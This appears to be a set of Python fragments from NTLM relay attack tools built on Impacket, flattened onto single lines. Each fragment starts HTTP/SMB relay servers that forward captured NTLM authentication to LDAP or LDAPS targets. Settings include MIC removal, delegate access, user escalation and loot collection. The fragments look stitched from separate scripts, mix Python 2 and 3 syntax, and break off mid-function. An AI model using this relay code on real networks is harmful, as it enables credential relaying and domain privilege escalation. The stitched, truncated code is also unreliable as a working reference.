def start_servers(options, threads): RELAY_SERVERS = [HTTPRelayServer] for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setInteractive(options.interactive) c.setGPotatoStartUp(options.upload) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) c.setListeningPort(options.http_port) s = server(c) s.start() threads.add(s) return c
def startServers(passargs): ldaps_server = passargs.ldaps PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets( TargetsProcessor(singleTarget=str("ldaps://" + ldaps_server), protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') c.setInterfaceIp("0.0.0.0") c.setExploitOptions(True) c.setSMB2Support(True) c.delegateaccess = True c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = SMBRelayServer(c) s.start() logging.info("Relay servers started, waiting for connection....") try: status = exploit(passargs) if status: exp = Thread(target=checkauth, args=(passargs, )) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt as e: logging.info("Shutting down...") s.server.shutdown() else: logging.error("Error in exploit, Shutting down...") s.server.shutdown() except Exception as e: print(e) logging.error("Error in exploit, Shutting down...") logging.info("Shutting down...") s.server.shutdown()
def startServers(passargs): targetSystem = passargs.target_host privuser = passargs.user PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = [HTTPRelayServer, SMBRelayServer] serverThreads = [] for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets( TargetsProcessor(singleTarget=str("ldap://" + targetSystem), protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') c.setInterfaceIp("0.0.0.0") c.setExploitOptions(True) c.escalateuser = privuser c.setSMB2Support(True) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started, waiting for connection....") try: status = exploit(passargs) if status: exp = Thread(target=checkauth, args=(passargs, )) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown() else: